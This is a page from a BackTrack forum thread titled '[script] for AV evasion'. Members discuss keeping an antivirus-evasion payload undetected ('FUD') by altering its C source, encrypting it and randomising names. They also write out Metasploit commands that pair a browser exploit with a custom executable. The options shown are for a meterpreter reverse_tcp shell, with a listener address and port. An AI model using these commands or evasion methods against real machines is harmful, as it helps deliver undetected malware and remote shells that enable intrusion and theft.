Page 9 of 12 FirstFirst ... 7891011 ... LastLast
Results 81 to 90 of 114

Thread: [script] for AV evasion

  1. #81
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: [script] for AV evasion

    I'll look into it.
    (\ /)
    ( . .)
    c(")(")

    This is bunny.
    Copy and paste bunny into your signature to help him gain world domination.

  2. #82
    Junior Member
    Join Date
    Jan 2010
    Posts
    40

    Default Re: [script] for AV evasion

    Thank you for your work on this script. Works great as a standalone executable. This may sound ignorant, do you know any way to use the exe as a payload in metasploit?

  3. #83
    Junior Member
    Join Date
    Aug 2011
    Posts
    34

    Default Re: [script] for AV evasion

    Quote Originally Posted by thaijames View Post
    Thank you for your work on this script. Works great as a standalone executable. This may sound ignorant, do you know any way to use the exe as a payload in metasploit?

    set EXE::Custom whatevercustompayloadyouwant

  4. #84
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    1

    Default Re: [script] for AV evasion

    Scaned on novirusthanks and avira and bitdefender detect it.

  5. #85
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: [script] for AV evasion

    Quote Originally Posted by xiaobu View Post
    Scaned on novirusthanks and avira and bitdefender detect it.
    hi,xiaobu ((OUT OF THREAD sorry-lhyx1!!!))
    try this method vs a "your list" av's worked :
    http://www.backtrack-linux.org/forum...ad.php?t=48283
    bye

  6. #86
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: [script] for AV evasion

    Scaned on novirusthanks and avira and bitdefender detect it.
    I think this is just signature based detection.
    When I'm feeling like it, I'll change the C file a little and then it will be FUD again
    Maybe I could also implement a stronger form of encryption like AES or RSC4.
    And I think I'm going to randomize all variable and function names.
    Last edited by LHYX1; 06-21-2012 at 04:53 AM.
    (\ /)
    ( . .)
    c(")(")

    This is bunny.
    Copy and paste bunny into your signature to help him gain world domination.

  7. #87
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    5

    Default Re: [script] for AV evasion

    Except for the part regarding encryption, I've done it. But BitDefender still recognizes it. I'm gonna try what was suggested by zimmaro and I'll let you know

  8. #88
    Junior Member
    Join Date
    Jan 2010
    Posts
    40

    Default Re: [script] for AV evasion

    Thank you for you help

    I try the following:
    use exploit/windows/browser/msxml_get_definition_code_exec
    set EXE::Custom /root/test.exe
    set URIPATH test
    exploit -j

    When I access the generated link through a windows browser the above (zero day) exploit works fine, however the payload is not my custom exe and gets detected by anti virus
    when I run test.ext on the same windows machine no detection. So metasploit must be using the default payload for this and not the custom exe?

    Or do I also need to set the payload options?

    current:
    Payload options (windows/meterpreter/reverse_tcp):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    EXITFUNC process yes Exit technique: seh, thread, process, none
    LHOST 192.168.0.150 yes The listen address
    LPORT 4444 yes The listen port


    Exploit target:

    Id Name
    -- ----
    0 Automatic

    Thanks in advance.




    Quote Originally Posted by jnpa123 View Post
    set EXE::Custom whatevercustompayloadyouwant

  9. #89
    Junior Member
    Join Date
    Aug 2011
    Posts
    34

    Default Re: [script] for AV evasion

    Quote Originally Posted by thaijames View Post
    Thank you for you help

    I try the following:
    use exploit/windows/browser/msxml_get_definition_code_exec
    set EXE::Custom /root/test.exe
    set URIPATH test
    exploit -j

    When I access the generated link through a windows browser the above (zero day) exploit works fine, however the payload is not my custom exe and gets detected by anti virus
    when I run test.ext on the same windows machine no detection. So metasploit must be using the default payload for this and not the custom exe?

    Or do I also need to set the payload options?

    current:
    Payload options (windows/meterpreter/reverse_tcp):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    EXITFUNC process yes Exit technique: seh, thread, process, none
    LHOST 192.168.0.150 yes The listen address
    LPORT 4444 yes The listen port


    Exploit target:

    Id Name
    -- ----
    0 Automatic

    Thanks in advance.
    i think some exploits doesnt support custom payloads use "show advanced" and check if the EXE::Custom is available

  10. #90
    Junior Member
    Join Date
    Jan 2010
    Posts
    40

    Default Re: [script] for AV evasion

    That is what I thought, thanks for confirming it.

    Quote Originally Posted by jnpa123 View Post
    i think some exploits doesnt support custom payloads use "show advanced" and check if the EXE::Custom is available

Page 9 of 12 FirstFirst ... 7891011 ... LastLast

Similar Threads

  1. Script for simple AV evasion (tested on AVG, Avast, Emisoft)
    By LHYX1 in forum BackTrack 5 General Topics
    Replies: 16
    Last Post: 05-01-2012, 09:26 PM
  2. Script for simple AV evasion (tested on AVG, Avast, Emisoft)
    By LHYX1 in forum BackTrack 5 Beginners Section
    Replies: 1
    Last Post: 07-16-2011, 02:16 PM
  3. Snort Signature Evasion with Metasploit
    By T0XIC in forum BackTrack 5 Videos
    Replies: 6
    Last Post: 07-01-2011, 12:21 PM
  4. Advanced antivirus evasion techniques
    By AzraelSepultura in forum Beginners Forum
    Replies: 4
    Last Post: 03-01-2011, 06:57 AM
  5. Firewall evasion techniques?
    By knithx in forum OLD Pentesting
    Replies: 2
    Last Post: 09-21-2009, 06:46 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •